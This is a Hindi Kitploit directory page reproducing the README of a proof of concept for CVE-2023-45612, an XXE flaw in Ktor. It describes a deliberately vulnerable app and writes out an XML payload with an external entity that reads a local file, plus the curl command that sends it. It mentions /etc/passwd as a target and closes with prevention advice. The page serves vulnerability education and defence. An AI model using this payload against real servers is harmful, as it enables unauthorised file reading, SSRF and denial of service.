Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ktor-cve-2023-45612-poc — Ktor XXE इंजेक्शन प्रूफ-ऑफ-कॉन्सेप्ट (CVE-2023-45612) | Kitploit
उपकरण/GitHubGitHub/stefan-500/ktor-cve-2023-45612-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षागलत कॉन्फ़िगरेशनलर्निंग और शिक्षा
GitHubstefan-500/ktor-cve-2023-45612-poc

ktor-cve-2023-45612-poc

Ktor XXE इंजेक्शन प्रूफ-ऑफ-कॉन्सेप्ट (CVE-2023-45612)

रिपॉजिटरी देखें
1310 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Ktor XXE भेद्यता प्रूफ-ऑफ-कॉन्सेप्ट (CVE-2023-45612)

सारांश

प्रभाव: एक विशेष रूप से निर्मित XML DTD के माध्यम से XXE संदर्भ के साथ मनमानी फ़ाइलों तक पहुंच।
मूल कारण: असुरक्षित XML दस्तावेज़ पार्सर।

इस रिपॉजिटरी में एक भेद्य Ktor 2.3.4 ऐप है जिसे बाहरी एंटिटी की अनुमति देने के लिए कॉन्फ़िगर किया गया है ताकि XXE प्रभाव दिखाई दे।

विवरण

XML External Entity इंजेक्शन (CVE-2023-45612) प्रूफ ऑफ कॉन्सेप्ट के लिए भेद्य Ktor (v2.3.4) एप्लिकेशन।

CVE-2023-45612, Ktor के ContentNegotiation में एक XXE (XML External Entity) बग है, जब XML को 2.3.5. से पहले के संस्करणों में सक्षम किया गया हो।
यह भेद्यता CWE-611: Improper Restriction of XML External Entity Reference से मेल खाती है।
XXE, OWASP Top 10 A05:2021-Security Misconfiguration जोखिम श्रेणी का हिस्सा है, लेकिन यह एक असुरक्षित डिज़ाइन समस्या भी है, क्योंकि इसका कारण एक गैर-प्रतिबंधात्मक XML पार्सर है।

Ulf Karlsson द्वारा रिपोर्ट किया गया — Jetbrains security notes देखें।

प्रभावित घटक और संस्करण

2.3.5 से पुराने Ktor संस्करण

पुनरुत्पादन वातावरण

समस्या को पुन: उत्पन्न करने के लिए मेरा सेटअप:

  • IntelliJ IDEA 2025.2.4
  • Ktor 2.3.4
  • JDK 21
  • OS: Windows 10

XXE की व्याख्या

XML दस्तावेज़ों में वैकल्पिक रूप से एक Document Type Definition (DTD) होती है, जो अन्य सुविधाओं के अलावा, XML एंटिटीज़ को परिभाषित करने में सक्षम बनाती है। URI के रूप में एक प्रतिस्थापन स्ट्रिंग प्रदान करके किसी एंटिटी को परिभाषित करना संभव है। XML पार्सर इस URI की सामग्री तक पहुंच सकता है और आगे की प्रक्रिया के लिए इन सामग्रियों को वापस XML दस्तावेज़ में शामिल कर सकता है। file:// URI के साथ एक बाहरी एंटिटी को परिभाषित करने वाली XML फ़ाइल सबमिट करके, एक हमलावर प्रोसेसिंग एप्लिकेशन को स्थानीय फ़ाइल की सामग्री पढ़ने के लिए प्रेरित कर सकता है।
उदाहरण के लिए, "file:///c:/winnt/win.ini" जैसा URI (Windows में) C:\Winnt\win.ini फ़ाइल को निर्दिष्ट करता है, या file:///etc/passwd Unix-आधारित सिस्टम में पासवर्ड फ़ाइल को निर्दिष्ट करता है।
(https://cwe.mitre.org/data/definitions/611.html)

यह कैसे काम करता है

http://localhost:8080/xml एंडपॉइंट पर एक POST अनुरोध किया जाता है।
अनुरोध एक xml फ़ाइल, exploit/payloads/xxe-demo-file.xml, भेजता है जिसमें एक <!DOCTYPE> तत्व होता है, जिसमें एक बाहरी एंटिटी संदर्भित होती है, इस मामले में exploit/etc/secret.txt।

यह संभावित रूप से सिस्टम पर कोई भी अन्य फ़ाइल हो सकती है जिस तक प्रोसेस की पहुंच हो।

xxe-demo-file.xml

root@kitploit:~
<!DOCTYPE Mail [ <!ENTITY xxe SYSTEM "exploit/etc/secret.txt"> ]>
<Mail><title>&xxe;</title></Mail>

XML पार्सर (DTD की अनुमति देने के लिए कॉन्फ़िगर किया गया) इस तत्व को रिज़ॉल्व करता है और संसाधन डेटा प्राप्त करता है।

बाहरी संदर्भ SSRF एंडपॉइंट का पथ भी हो सकता है, या सिस्टम के संसाधनों को घेरने के लिए एक बड़ी फ़ाइल की ओर इशारा कर सकता है (DOS)।

पुनरुत्पादन चरण

  1. सर्वर चलाएं:
root@kitploit:~
./gradlew run
  1. आउटपुट इस प्रकार होना चाहिए:
root@kitploit:~
Responding at http://127.0.0.1:8080
  1. curl का उपयोग करके XXE पेलोड भेजें:
root@kitploit:~
 curl -i http://localhost:8080/xml -H "Content-Type: application/xml" --data-binary @exploit/payloads/xxe-demo-file.xml

अपेक्षित परिणाम (भेद्य):

कंसोल आउटपुट: Received: <external entity data>

अपेक्षित परिणाम (सुरक्षित):

400 Bad Request, या समान (XML पार्सर Document Type Definition को ब्लॉक करता है)

साक्ष्य

कमांड चलाएं:

ऐप कमांड चलाएं

cURL का उपयोग करके XXE पेलोड भेजें, और परिणाम इंजेक्ट की गई फ़ाइल की सामग्री प्रदर्शित करता हुआ:

ऐप कमांड चलाएं

गंभीरता

गंभीरता उच्च/क्रिटिकल है। संभावित स्थानीय फ़ाइल पुनर्प्राप्ति, SSRF हमला, DoS हमला, या अन्य सिस्टम प्रभाव।
NVD बेस स्कोर: 9.8 CRITICAL (CVSS v3) (https://nvd.nist.gov/vuln/detail/CVE-2023-45612)

डेवलपर्स के लिए रोकथाम दिशानिर्देशों का मसौदा

  • XML पार्सर को बाहरी एंटिटीज़ को रिज़ॉल्व न करने के लिए कॉन्फ़िगर करें। यदि बाहरी एंटिटीज़ की आवश्यकता हो, तो रिक्वेस्ट टाइमआउट, डेटा पुनर्प्राप्ति सीमा के साथ एक कस्टम XmlResolver लागू करें, और स्थानीय रूप से पुनर्प्राप्त किए जा सकने वाले संसाधनों को प्रतिबंधित करें।
  • OWASP XXE Prevention cheat sheet जैसे संसाधनों का उपयोग करें, जो विभिन्न तकनीकों के लिए विशेष रूप से XXE रोकथाम कार्यान्वयन को कवर करता है।
  • SAST को CI में एकीकृत करें, क्योंकि यह स्रोत कोड का विश्लेषण करके इस कमजोरी के कुछ उदाहरणों को खोज सकता है।
  • डिपेंडेंसी संस्करणों और भेद्यताओं को ट्रैक और विश्लेषण करें।
  • कंपनी स्तर पर सुरक्षित कोडिंग मानकों को लागू करें।
  • SDLC के दौरान सुरक्षा के एकीकरण पर जोर दें, विशेष रूप से डिज़ाइन और डेवलपर परीक्षण चरणों में।

संदर्भ

  • https://nvd.nist.gov/vuln/detail/CVE-2023-45612
  • https://cwe.mitre.org/data/definitions/611.html
  • https://capec.mitre.org/data/definitions/221.html
  • https://medium.com/@iason.tzortzis/xxe-xml-external-entity-injection-explained-e8be5f1f7cd7
  • https://ktor.io/docs/server-create-a-new-project.html#create-project-with-the-ktor-project-generator
  • https://www.jetbrains.com/privacy-security/issues-fixed/?product=Ktor
  • https://ktor.io/docs/2.3.13/welcome.html
  • https://portswigger.net/web-security/xxe#exploiting-xxe-to-retrieve-files
  • https://ssojet.com/parse-and-generate-formats/parse-and-generate-xml-in-ktor/
  • https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
  • https://owasp.org/Top10/A05_2021-Security_Misconfiguration/
टूल डाउनलोड करें